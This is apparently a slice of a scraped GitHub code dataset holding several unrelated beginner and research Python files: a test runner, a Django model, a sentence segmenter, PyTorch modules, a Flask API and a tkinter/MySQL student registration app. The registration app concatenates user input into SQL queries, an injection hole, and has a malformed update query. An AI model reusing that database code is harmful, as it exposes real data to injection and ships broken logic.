super(AppEngineTestBase, self).tearDown()\n\n def get_mail_stub(self):\n return self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n\ndef create_test_suite(parsed_args):\n \"\"\"Loads all requested test suites.\n\n By default, loads all unittest.TestCases found under the project root's\n tests/ directory.\n\n Args:\n parsed_args: argparse.Namespace. Processed command-line arguments.\n\n Returns:\n unittest.TestSuite. The test suite populated with all tests to run.\n \"\"\"\n loader = unittest.TestLoader()\n if not parsed_args.test_class_name:\n raise Exception('Expected --test_class_name to be specified.')\n os.environ['GCB_TEST_MODE'] = 'true'\n return loader.loadTestsFromName(parsed_args.test_class_name)\n\n\ndef fix_sys_path():\n \"\"\"Fix the sys.path to include GAE extra paths.\"\"\"\n import dev_appserver # pylint: disable=C6204\n\n # dev_appserver.fix_sys_path() prepends GAE paths to sys.path and hides\n # our classes like 'tests' behind other modules that have 'tests'.\n # Here, unlike dev_appserver, we append the path instead of prepending it,\n # so that our classes come first.\n sys.path += dev_appserver.EXTRA_PATHS[:]\n\n # This is to work around an issue with the __import__ builtin. The\n # problem seems to be that if the sys.path list contains an item that\n # partially matches a package name to import, __import__ will get\n # confused, and report an error message (which removes the first path\n # element from the module it's complaining about, which does not help\n # efforts to diagnose the problem at all).\n #\n # The specific case where this causes an issue is between\n # $COURSEBUILDER_HOME/tests/internal and $COURSEBUILDER_HOME/internal\n # Since the former exists, __import__ will ignore the second, and so\n # things like .../internal/experimental/autoregister/autoregister\n # cannot be loaded.\n #\n # To address this issue, we ensure that COURSEBUILDER_HOME is on sys.path\n # before anything else, and do it before appengine_config's module\n # importation starts running. (And we have to do it here, because if we\n # try to do this within appengine_config, AppEngine will throw an error)\n if appengine_config.BUNDLE_ROOT in sys.path:\n sys.path.remove(appengine_config.BUNDLE_ROOT)\n sys.path.insert(0, appengine_config.BUNDLE_ROOT)\n\n\nclass DebugTestResult(unittest.TextTestResult):\n\n def addError(self, test, err):\n pdb.post_mortem(err[2])\n super(DebugTestResult, self).addError(test, err)\n\n def addFailure(self, test, err):\n pdb.post_mortem(err[2])\n super(DebugTestResult, self).addFailure(test, err)\n\n\ndef main():\n \"\"\"Starts in-process server and runs all test cases in this module.\"\"\"\n fix_sys_path()\n\n etl._set_env_vars_from_app_yaml()\n parsed_args = _PARSER.parse_args()\n test_suite = create_test_suite(parsed_args)\n\n kwargs = {\n 'verbosity': 2,\n }\n\n if parsed_args.pdb:\n kwargs['resultclass'] = DebugTestResult\n\n result = unittest.TextTestRunner(**kwargs).run(test_suite)\n if result.errors or result.failures:\n raise Exception(\n 'Test suite failed: %s errors, %s failures of '\n ' %s tests run.' % (\n len(result.errors), len(result.failures), result.testsRun))\n\n import tests.functional.actions as actions\n\n count = len(actions.UNIQUE_URLS_FOUND.keys())\n result.stream.writeln('INFO: Unique URLs found: %s' % count)\n result.stream.writeln('INFO: All %s tests PASSED!' % result.testsRun)\n\n\nif __name__ == '__main__':\n appengine_config.gcb_force_default_encoding('ascii')\n main()\n","repo_name":"google/coursebuilder-core","sub_path":"coursebuilder/tests/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":10982,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"5"} +{"seq_id":"6289993150","text":"def sequence():\r\n \"\"\"\r\n Function for squaring each element in a list and printing them\r\n \"\"\"\r\n\r\n A = [1, 2, 3, 4, 5, 6] # Sample List\r\n for i in range(len(A)): # 'for' loop to traverse the List\r\n A[i] = A[i]**2 # Squaring each element of the list\r\n for a in A: # Printing the New list\r\n print(a)\r\n\r\n print(\"The sequence has ended\") # Showing that the sequence has ended\r\n\r\n\r\nif __name__ == '__main__':\r\n sequence()\r\n","repo_name":"akashqp/Internshala---Fittlyf-Assignment","sub_path":"Question_1.py","file_name":"Question_1.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38273334660","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ContactInfo(models.Model):\n address = models.CharField(max_length=256)\n email = models.EmailField()\n tel = models.CharField(max_length=14)\n fb = models.URLField(max_length=256)\n fb_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n twitter = models.URLField(max_length=256)\n twitter_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n instagram = models.URLField(max_length=256)\n instagram_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n height_field = models.IntegerField(default=30)\n width_field = models.IntegerField(default=30)\n\n def __unicode__(self):\n return self.email\n","repo_name":"saadmk11/Restaurant-Website","sub_path":"src/contact/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"10541732018","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 9 14:31:41 2018\r\n\r\n@author: James\r\n\"\"\"\r\n\r\n#list of common abbreviations\r\nabbreviations = [\"mr.\", \"mrs.\", \"ms.\", \"dr.\", \"st.\", \"e.g.\", \"i.e.\", \"jr.\", \"sr.\", \"vs.\", \"ph.d.\", \"mt.\", \"p.s.\", \"a.s.a.p.\", \"d.i.y.\"]\r\n#variables\r\nsentenceNum = 1\r\nsentence = \"\"\r\nsentenceList = []\r\nclosedQuote = True\r\n\r\n\r\n\r\n\r\n\r\n#read in the input file, remove new lines, split based on spaces\r\n#data= open(\"test_input3.txt\", \"r\")\r\ndata= open(\"input.txt\", \"r\")\r\ndata= data.read()\r\ndata = data.replace(\"\\n\", \" \")\r\ndata=data.split(' ')\r\n\r\n\r\n\r\n\r\n#segmentSentences function takes in a list of words, combines them into sentences, and adds those sentences to sentenceList \r\ndef segmentSentences(words):\r\n global sentence\r\n global closedQuote\r\n #loop through each word in the input file\r\n for i in words:\r\n #bool closedQuote is only false when there is an opening quotation mark, but not a closing one\r\n if('\"' in i):\r\n closedQuote = not closedQuote\r\n # this if is for words that contain the end of a quotation\r\n if(closedQuote == True and '\"' in i):\r\n #if the word doesn't contain a sentence terminator, keep adding to the sentence\r\n if('.' not in i and '?' not in i and '!' not in i):\r\n sentence = sentence + i + \" \"\r\n #if it contains a terminator, check if the next word is capitalized. If it is, start a new sentence. If not, don't end the sentence\r\n elif('?' in i or '!' in i):\r\n index = words.index(i)\r\n next = words[index+1]\r\n if(next[1].isupper()):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n sentence = sentence + i + \" \"\r\n #if the word contains a period, check if it's an abbreviation\r\n elif('.' in i):\r\n # print(i)\r\n if(i.lower() in abbreviations):\r\n sentence = sentence + i + \" \"\r\n #check if the next word is capitalized\r\n else:\r\n index = words.index(i)\r\n next = words[index+1]\r\n if(next[0].isupper()):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n sentence = sentence + i + \" \"\r\n #the else is for words that don't contain the end of a quotation \r\n else:\r\n if('.' not in i and '?' not in i and '!' not in i):\r\n sentence = sentence + i + \" \"\r\n elif('?' in i or '!' in i):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n #check if the word is in the list of common abbreviations. If it is, don't end the sentence.\r\n if(i.lower() in abbreviations):\r\n sentence = sentence + i + \" \"\r\n #if the last character isn't a period, it is probably a number or abbreviation, so don't end the sentence\r\n elif(i[-1] != '.'):\r\n sentence = sentence + i + \" \"\r\n #otherwise, end the sentence and start a new one\r\n else:\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n \r\n#create new file to write the output to\r\noutputFile= open(\"output.txt\",\"w+\")\r\n\r\n\r\n#call the function\r\nsegmentSentences(data)\r\n\r\n#write the segmented sentences to output.txt\r\nfor i in sentenceList:\r\n #some sentences have extra space at the front due to replacing new line with a space. This checks for that and removes the extra space if it exists.\r\n if(i[0] == \" \"):\r\n outputFile.write(str(sentenceNum) + \": \" + i[1:] + '\\n')\r\n else:\r\n outputFile.write(str(sentenceNum) + \": \" + i + '\\n')\r\n sentenceNum += 1","repo_name":"jwedwar1/Natural-Language-Processing","sub_path":"Sentence Segmenter/Sentence Segmenter.py","file_name":"Sentence Segmenter.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6774128583","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\n\nfrom .blocks import get_sinusoid_encoding, TransformerEncoderBlock, LayerNorm\nfrom .resnet import resnet8_cifar, resnet10_imagenet\n\n\nclass BranchEncoder(nn.Module):\n \"\"\"\n A backbone with a stack of transformer encoder layers.\n \n learned knob embeddings\n -> [embedding projection] \n -> [self-attn transformer x L]\n -> branch embeddings\n \"\"\"\n def __init__(\n self, \n embd_dim, # embedding dimension\n out_dim, # output dimension\n seq_len, # input sequence length\n n_heads, # number of attention heads\n n_layers=5, # number of transformer encoder layers\n attn_pdrop=0.1, # dropout rate for attention map\n proj_pdrop=0.1, # dropout rate for projection\n path_pdrop=0.1, # dropout rate for residual paths\n eos=True, # if True, add end-of-sequence token.\n embd_type=0, # knob embedding type (0, 1)\n pe_type=0, # position encoding type (-1, 0, 1)\n # -1: none\n # 0: transformer-style\n # 1: perceiver-style\n ):\n super(BranchEncoder, self).__init__()\n\n self.seq_len = seq_len\n\n # learned knob encodings\n ## NOTE: include a [EOS] token to encode hidden state\n assert embd_type in (0, 1)\n self.embd_type = embd_type\n self.eos = eos\n if embd_type == 0:\n self.ke = nn.Embedding(seq_len + eos, embd_dim)\n self.be = nn.Embedding(2, embd_dim)\n else:\n self.ke = nn.Embedding(seq_len * 2 + eos, embd_dim)\n\n # position encodings (t+1, c)\n assert pe_type in (-1, 0, 1)\n self.pe_type = pe_type\n if pe_type in (0, 1):\n pe = get_sinusoid_encoding(seq_len + eos, embd_dim // 2, pe_type)\n pe /= embd_dim ** 0.5\n self.register_buffer('pe', pe, persistent=False)\n\n # self-attention transformers\n self.transformer = nn.ModuleList()\n for _ in range(n_layers):\n self.transformer.append(\n TransformerEncoderBlock(\n embd_dim, \n n_heads=n_heads, \n attn_pdrop=attn_pdrop, \n proj_pdrop=proj_pdrop, \n path_pdrop=path_pdrop,\n )\n )\n\n # hidden state projection\n self.fc = nn.Linear(embd_dim, out_dim)\n \n self.apply(self.__init_weights__)\n\n def __init_weights__(self, module):\n if isinstance(module, (nn.Linear, nn.Conv1d)):\n if module.bias is not None:\n nn.init.zeros_(module.bias)\n elif isinstance(module, nn.Embedding):\n nn.init.normal_(module.weight, std=0.01)\n\n def forward(self, masks):\n \"\"\"\n Args:\n masks (bool tensor, (n, kb)): branch masks.\n\n Returns:\n x (float tensor, (n, c)): branch embeddings.\n \"\"\"\n bs, t = masks.size()\n assert t == self.seq_len\n\n # add knob, binary and position encodings\n if self.embd_type == 0:\n x = self.ke.weight.transpose(0, 1) # (c, t+1)\n if self.pe_type in (0, 1):\n x = x + self.pe # (c, t+1)\n be = self.be(masks.int()).transpose(1, 2) # (n, c, t)\n x = x.repeat(bs, 1, 1) # (n, c, t+1)\n if self.eos:\n x[..., :-1] = x[..., :-1] + be\n else:\n x = x + be\n else:\n ke_idx = torch.arange(\n self.seq_len, device=masks.device\n ) * 2 + masks # (n, kb)\n if self.eos:\n ke_idx = torch.cat(\n [ke_idx, self.ke.num_embeddings * ke_idx.new_ones(bs, 1)], \n dim=1,\n )\n x = self.ke(ke_idx).transpose(1, 2) # (n, c, t)\n if self.pe_type in (0, 1):\n x = x + self.pe\n\n # self-attention transformers\n for idx in range(len(self.transformer)):\n x = self.transformer[idx](x)\n\n # hidden state projection\n if self.eos:\n x = x[..., -1]\n else:\n x = x.mean(dim=-1)\n x = self.fc(x) # (n, c) # c: out_dim: 128 in res18_cifar10\n return x\n\n\nclass ContentEncoder(nn.Module):\n\n def __init__(self, out_dim, arch='mobilenet_v2', pretrained=False):\n super(ContentEncoder, self).__init__()\n\n ## NOTE: all GFLOPs assume 224x224 input\n if arch == 'mobilenet_v2': # 0.3 GFLOPs\n model = models.mobilenet_v2(pretrained).features\n embd_dim = 1280\n elif arch == 'mobilenet_v3_large': # 0.219 GFLOPs\n model = models.mobilenet_v3_large(pretrained).features\n embd_dim = 960\n elif arch == 'mobilenet_v3_small': # 0.056 GFLOPs\n model = models.mobilenet_v3_small(pretrained).features\n embd_dim = 576\n elif arch == 'efficientnet_b0': # 0.39 GFLOPs\n model = models.efficientnet_b0(pretrained).features\n embd_dim = 1280\n elif arch == 'efficientnet_b1': # 0.70 GFLOPs\n model = models.efficientnet_b1(pretrained).features\n embd_dim = 1280\n elif arch == 'efficientnet_b2': # 1.0 GFLOPs\n model = models.efficientnet_b2(pretrained).features\n embd_dim = 1408\n elif arch == 'efficientnet_b3': # 1.8 GFLOPs\n model = models.efficientnet_b3(pretrained).features\n embd_dim = 1536\n elif arch == 'resnet8_cifar':\n model = resnet8_cifar()\n embd_dim = 64\n elif arch == 'resnet10_imagenet':\n model = resnet10_imagenet()\n embd_dim = 512\n else:\n raise NotImplementedError(\n 'invalid content encoder architecture: {:s}'.format(arch)\n )\n\n self.model = model\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(embd_dim, out_dim)\n\n def forward(self, x):\n x = self.model(x)\n x = self.avgpool(x).flatten(1)\n x = self.fc(x)\n return x\n\n\nclass BranchVAE(nn.Module):\n \"\"\"\n A variational autoencoder for branch sampling at inference time.\n \"\"\"\n def __init__(self, in_dim, hid_dim, n_layers, latent_dim):\n super(BranchVAE, self).__init__()\n\n self.in_dim = in_dim\n self.latent_dim = latent_dim\n\n # encoder\n ## NOTE: output is Gaussian mean and log variance\n enc = []\n for _ in range(n_layers - 1):\n enc.append(\n nn.Sequential(\n nn.Linear(in_dim, hid_dim), \n nn.ReLU(inplace=True),\n )\n )\n in_dim = hid_dim\n enc.append(nn.Linear(in_dim, latent_dim * 2))\n self.enc = nn.Sequential(*enc)\n\n # decoder\n ## NOTE: output is Bernoulli mean\n dec = []\n for _ in range(n_layers - 1):\n dec.append(\n nn.Sequential(\n nn.Linear(latent_dim, hid_dim), \n nn.ReLU(inplace=True),\n )\n )\n latent_dim = hid_dim\n dec.append(nn.Linear(latent_dim, self.in_dim))\n self.dec = nn.Sequential(*dec)\n\n def _encode(self, x):\n x = self.enc(x)\n mu, log_var = x.split(self.latent_dim, dim=1)\n return mu, log_var\n\n def _sample(self, mu, log_var):\n sigma = torch.exp(0.5 * log_var)\n z = torch.randn_like(sigma) * sigma + mu\n return z\n\n def _decode(self, z):\n x = self.dec(z)\n return x\n\n def forward(self, x=None, z=None):\n # train\n if x is not None and z is None:\n mu, log_var = self._encode(x.float())\n z = self._sample(mu, log_var)\n logits = self._decode(z)\n return logits, mu, log_var\n # test\n elif x is None and z is not None:\n p = torch.sigmoid(self._decode(z))\n return p\n else:\n raise ValueError('one of x and z must be given')","repo_name":"OliverXUZY/adaptive_inference","sub_path":"libs/model/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4958335637","text":"from datetime import *\n\ndef gun_to_tarih(yil, gun):\n # Verilen yılın 1 Ocak tarihini oluşturun\n tarih = datetime(yil, 1, 1)\n \n # Verilen gün sayısı kadar gün ekleyin (gun - 1 çünkü günler 0'dan başlar)\n tarih += timedelta(days=gun - 1)\n\n return tarih\n\nstart = int(input(\"What's your starting minute: \"))\n\nstart_day = date.today()\n\nday_of_year = start_day.strftime(\"%j\")\n\nk = 0\n\nfor i in range(int(day_of_year),366):\n k += 1\n with open('E:/www/python/basic-projects/Habit Generator/habit.txt', 'a') as file:\n file.write(f\"{gun_to_tarih(datetime.now().year, i).strftime('%d/%m/%Y')} - Starting day is {k} - Working minute {round(start,2)}\\n\")\n\n start = start + ((start / 100) * 1)","repo_name":"Bahrilangelo/Basic-Projects","sub_path":"Habit Generator/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22259102823","text":"from flask import Flask, jsonify, request\r\nimport math\r\napp= Flask(__name__)\r\n\r\n@app.route(\"/nombre\", methods=[\"POST\"])\r\ndef setName():\r\n if request.method=='POST':\r\n dato_posteado = request.get_json()\r\n dato = dato_posteado['dato']\r\n return jsonify(str(\"Almacenado correctamente \" + str(dato)))\r\n \r\n@app.route(\"/mensaje\", methods=[\"GET\"])\r\ndef message():\r\n dato_posteado = request.get_json()\r\n nombre = dato_posteado['nombre']\r\n return jsonify(\"Saludos cordiales, \" + nombre)\r\n\r\n@app.route(\"/raices\", methods=[\"GET\"])\r\ndef calcularRaices():\r\n # Obtén los valores a, b y c de la URL\r\n coefa = float(request.args.get(\"a\"))\r\n coefb = float(request.args.get(\"b\"))\r\n coefc = float(request.args.get(\"c\"))\r\n\r\n # Calcula las raíces de la ecuación cuadrática\r\n discriminante = coefb**2 - 4*coefa*coefc\r\n if discriminante > 0:\r\n x1 = (-coefb + math.sqrt(discriminante)) / (2*coefa)\r\n x2 = (-coefb - math.sqrt(discriminante)) / (2*coefa)\r\n return jsonify({\"raices\": [x1, x2]})\r\n elif discriminante == 0:\r\n x = -coefb / (2*coefa)\r\n return jsonify({\"raices\": [x]})\r\n else:\r\n return jsonify({\"raices\": []}) # No hay raíces reales\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"EduardoFloresR/Flask_API_Implementation","sub_path":"P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70438623511","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport pymysql\n\n\nroot = Tk()\n\nroot.title(\"STUDENT REG\")\nroot.geometry('1417x720')\nroot.resizable(False, False)\nmy_tree = ttk.Treeview(root)\n\nbg = PhotoImage(file=\"./banner.png\")\n\nbg_label = Label(root, image=bg)\nbg_label.place(x=0, y=0)\n\nicon = Image.open(\"./icon.jpg\")\n\n#resize\nresized = icon.resize((420,550), Image.ANTIALIAS)\n\n#call\nnew_icon = ImageTk.PhotoImage(resized)\n\n\nicon = ImageTk.PhotoImage(Image.open(\"./icon.jpg\"))\nicon_label = Label(image=new_icon)\nicon_label.place(x=1, y=183)\n\nph1 = tk.StringVar()\nph2 = tk.StringVar()\nph3 = tk.StringVar()\nph4 = tk.StringVar()\nph5 = tk.StringVar()\nph6 = tk.StringVar()\nph7 = tk.StringVar()\nph8 = tk.StringVar()\nph9 = tk.StringVar()\n\n\ndef setph(word,num):\n if num == 1:\n ph1.set(word)\n if num == 2:\n ph2.set(word)\n if num == 3:\n ph3.set(word)\n if num == 4:\n ph4.set(word)\n if num == 5:\n ph5.set(word)\n if num == 6:\n ph6.set(word)\n if num == 7:\n ph7.set(word)\n if num == 8:\n ph8.set(word)\n if num == 9:\n ph9.set(word)\n\n\ndef connection():\n conn =pymysql.connect(\n host = 'localhost', user = 'root', password ='', db = 'personal_infos_db')\n return conn\n\ndef refreshTable():\n for i in my_tree.get_children():\n my_tree.delete(i)\n\n for array in read():\n my_tree.insert(parent='', index='end', iid=array,text=\"\", values=(array), tags=\"orow\")\n \n my_tree.tag_configure('orow', background=\"#EEEEEE\", font=('Verdana', 10))\n my_tree.place(x=430, y=400)\n\n\ndef read():\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM cs_students\")\n results = cursor.fetchall()\n conn.commit()\n conn.close()\n return results\n\n\ndef register():\n stud_num = str(stud_numEntry.get())\n l_name = str(l_nameEntry.get())\n f_name = str(f_nameEntry.get())\n birth = str(birthEntry.get())\n address = str(addressEntry.get())\n phone = str(phoneEntry.get())\n dept = str(track.get())\n course = str(n2.get())\n year = str(n3.get())\n\n if(stud_num == \"\" or stud_num == \" \") or (l_name == \"\" or l_name == \" \") or (f_name == \"\" or f_name == \" \") or (birth == \"\" or birth == \" \") or (address == \"\" or address == \" \") or (phone == \"\" or phone == \" \") or (dept == \"\" or dept == \" \") or (course == \"\" or course == \" \") or (year == \"\" or year == \" \"):\n messagebox.showinfo(\"Error\", \"Please Fill up all the fields\")\n return\n else:\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO cs_students VALUES('\"+stud_num+\"','\"+l_name+\"','\"+f_name+\"','\"+birth+\"','\"+address+\"','\"+phone+\"','\"+dept+\"','\"+course+\"','\"+year+\"')\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Student ID already Exists\")\n return\n stud_numEntry.delete(0, 'end')\n l_nameEntry.delete(0, 'end')\n f_nameEntry.delete(0, 'end')\n birthEntry.delete(0, 'end')\n addressEntry.delete(0, 'end')\n phoneEntry.delete(0, 'end')\n track.delete(0, 'end')\n n2.set(\"SELECTED COURSE\")\n n3.set(\"YEAR\")\n\n refreshTable()\n\ndef reset():\n desicion = messagebox.askquestion(\"Warning!\", \"Reset All Data?\")\n if desicion != \"yes\":\n return\n else:\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM cs_students\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n return\n refreshTable()\n\ndef delete():\n desicion = messagebox.askquestion(\"Deleting Data!\", \"Delete the data?\")\n if desicion != \"yes\":\n return\n else:\n selected_item = my_tree.selection()[0]\n deleteData = str(my_tree.item(selected_item)['values'][0])\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM cs_students WHERE stud_num= '\"+str(deleteData)+\"'\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n return\n \n refreshTable()\n\ndef update():\n selectedStudid = \"\"\n try:\n selected_item = my_tree.selection()[0]\n stud_num = str(my_tree.item(selected_item)['values'][0])\n l_name = str(my_tree.item(selected_item)['values'][1])\n f_name = str(my_tree.item(selected_item)['values'][2])\n birth = str(my_tree.item(selected_item)['values'][3])\n address = str(my_tree.item(selected_item)['values'][4])\n phone = str(my_tree.item(selected_item)['values'][5])\n dept = str(my_tree.item(selected_item)['values'][6])\n course = str(my_tree.item(selected_item)['values'][7])\n year = str(my_tree.item(selected_item)['values'][8])\n\n setph(stud_num, 1)\n setph(l_name, 2)\n setph(f_name, 3)\n setph(birth, 4)\n setph(address, 5)\n setph(phone, 6)\n setph(dept, 7)\n setph(course, 8)\n setph(year, 9)\n\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n\n stud_num = str(stud_numEntry.get())\n l_name = str(l_nameEntry.get())\n f_name = str(f_nameEntry.get())\n birth = str(birthEntry.get())\n address = str(addressEntry.get())\n phone = str(phoneEntry.get())\n dept = str(track.get())\n course = str(n2.get())\n year = str(n3.get())\n\n if(stud_num == \"\" or stud_num == \" \") or (l_name == \"\" or l_name == \" \") or (f_name == \"\" or f_name == \" \") or (birth == \"\" or birth == \" \") or (address == \"\" or address == \" \") or (phone == \"\" or phone == \" \") or (dept == \"\" or dept == \" \") or (course == \"\" or course == \" \") or (year == \"\" or year == \" \"):\n messagebox.showinfo(\"Error\", \"Please Fill up all the fields\")\n return\n else:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE cs_students SET STUDID ='\"+stud_num+\"',LNAME = '\"+l_name+\"',FNAME = '\"+f_name+\"',BIRTH = '\"+birth+\"',ADDRESS = '\"+address+\"',PHONE = '\"+phone+\"',DEPT = '\"+dept+\"',COURSE = '\"+course+\"',YEAR = '\"+year+\"' WHERE STUDID = '\"+selectedStudid+ \"' '\")\n stud_numEntry.delete(0, 'end')\n l_nameEntry.delete(0, 'end')\n f_nameEntry.delete(0, 'end')\n birthEntry.delete(0, 'end')\n addressEntry.delete(0, 'end')\n phoneEntry.delete(0, 'end')\n track.delete(0, 'end')\n n2.set(\"SELECTED COURSE\")\n n3.set(\"YEAR\")\n conn.commit()\n conn.close()\n refreshTable()\n\n\nlabel2 = tk.Label(root, text=\"ISU Student Registration\", font=('Verdana', 20, 'bold'))\nlabel2.place(x=750,y=190)\n\nLabel(root, text=\"Student ID: \", font=('Verdana', 13)).place(x=430, y=250)\n\nstud_numEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph1)\nstud_numEntry.place(x=550, y=252, height = 25)\n\nLabel(root, text=\"Last Name: \", font=('Verdana', 13)).place(x=730, y=250)\n\nl_nameEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph2)\nl_nameEntry.place(x=850, y=252, height = 25)\n\nLabel(root, text=\"First Name: \", font=('Verdana', 13)).place(x=1080, y=250)\n\nf_nameEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph3)\nf_nameEntry.place(x=1200, y=252, height = 25)\n\nLabel(root, text=\"Birthday: \", font=('Verdana', 13)).place(x=430, y=300)\n\nbirthEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph4)\nbirthEntry.place(x=550, y=300, height = 25)\n#birthEntry.insert(0, \"MM/DD/YY\")\n\nLabel(root, text=\"Address: \", font=('Verdana', 13)).place(x=730, y=300)\n\naddressEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph5)\naddressEntry.place(x=850, y=302, height = 25)\n\nLabel(root, text=\"Phone: \", font=('Verdana', 13)).place(x=1100, y=300)\n\nphoneEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph6)\nphoneEntry.place(x=1200, y=302, height = 25)\n\nLabel(root, text=\"Track: \", font=('Verdana', 13)).place(x=430, y=350)\n\n#label3 = Label(root, text=\"Department\", font=('Verdana', 13)).place(x=430, y=350)\n#stud_dep = ttk.Combobox(root,font=('Verdana', 8), state='readonly', value=[\"CCSICT\", \"EDUCATION\", \"CBM\", \"CJE\", \"SAS\"])\n#stud_dep.set(\" ---Select Department---\")\n#stud_dep.place(x=550, y=350, height = 27, width=169)\n\n#Label(root, text=\"Department: \", font=('Verdana', 13)).place(x=430, y=350)\n\n#deptEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph7)\n#deptEntry.place(x=550, y=350, height = 25)\nn = tk.StringVar()\ntrack = ttk.Combobox(root, width = 17,textvariable = n,font=('Verdana', 10, 'bold'))\ntrack.set(\"SELECTED TRACK\")\ntrack['values'] = ('DM - Data Mining Track', 'BA - Business Analytics Track')\ntrack['state'] = 'readonly'\ntrack.place(x=550, y=352, height=25)\n\nLabel(root, text=\"Course: \", font=('Verdana', 13)).place(x=730, y=350)\n#courseEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph8)\nn2 = tk.StringVar()\ncourse = ttk.Combobox(root, width = 17,textvariable = n2, font=('Verdana', 13, 'bold'))\ncourse.set(\"SELECTED COURSE\")\ncourse['values'] = ('BSCS', 'BSIT', 'BSPO', 'BPO', 'BSWD')\ncourse['state'] = 'readonly'\ncourse.place(x=850, y=350, height=25)\n\n#course = ttk.Combobox(root,font=('Verdana', 10), state='readonly', value=[\"1\", \"2\", \"3\", \"4\", \"5\"])\n#course.set(\" ---Select Course/Major--\")\n#courseEntry.place(x=850, y=350, height = 25, width=230)\n\nLabel(root, text=\"Year: \", font=('Verdana', 13)).place(x=1100, y=350)\nn3 = tk.StringVar()\nyear = ttk.Combobox(root, width=14, textvariable=n3, font=('Verdana', 13, 'bold'))\nyear.set(\"YEAR\")\nyear['values'] = ('1st year', '2nd year', '3rd year', '4th year')\nyear['state'] = 'readonly'\nyear.place(x=1200, y=350, height = 27)\n#yearEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph9)\n#yearEntry.place(x=1200, y=350, height = 27)\n\n\nButton(text=\"Register\", command=register, font=('Verdana', 20, 'bold'), width=10, height=1, bg='SpringGreen4').place(x=450, y=650)\n\nButton(text=\"Update\", command=update, font=('Verdana', 20, 'bold'), width=10, height=1, bg='SpringGreen4').place(x=700, y=650)\n\nButton(text=\"Delete\",command=delete, font=('Verdana', 20, 'bold'), width=10, height=1, bg='firebrick3').place(x=950, y=650)\n\nButton(text=\"Reset\", command=reset, font=('Verdana', 20, 'bold'), width=10, height=1, bg='firebrick3').place(x=1190, y=650)\n\n\n\nstyle = ttk.Style()\nstyle.configure(\"Treeview.Heading\", font=('Verdana', 9, 'bold'))\n\nmy_tree['columns'] = (\"Student ID\", \"Last Name\", \"First Name\", \"Birthday\", \"Address\", \"Phone\", \"Department\", \"Course\", \"Year\")\n\nmy_tree.column(\"#0\", width=0, stretch=NO)\nmy_tree.column(\"Student ID\", anchor=CENTER, width=85)\nmy_tree.column(\"Last Name\", anchor=CENTER, width=110)\nmy_tree.column(\"First Name\", anchor=CENTER, width=120)\nmy_tree.column(\"Birthday\", anchor=CENTER, width=100)\nmy_tree.column(\"Address\", anchor=CENTER, width=120)\nmy_tree.column(\"Phone\", anchor=CENTER, width=110)\nmy_tree.column(\"Department\", anchor=CENTER, width=120)\nmy_tree.column(\"Course\", anchor=CENTER, width=130)\nmy_tree.column(\"Year\", anchor=CENTER, width=70)\n\nmy_tree.heading(\"Student ID\", text=\"Student ID\", anchor=CENTER)\nmy_tree.heading(\"Last Name\", text=\"Last Name\", anchor=CENTER)\nmy_tree.heading(\"First Name\", text=\"First Name\", anchor=CENTER)\nmy_tree.heading(\"Birthday\", 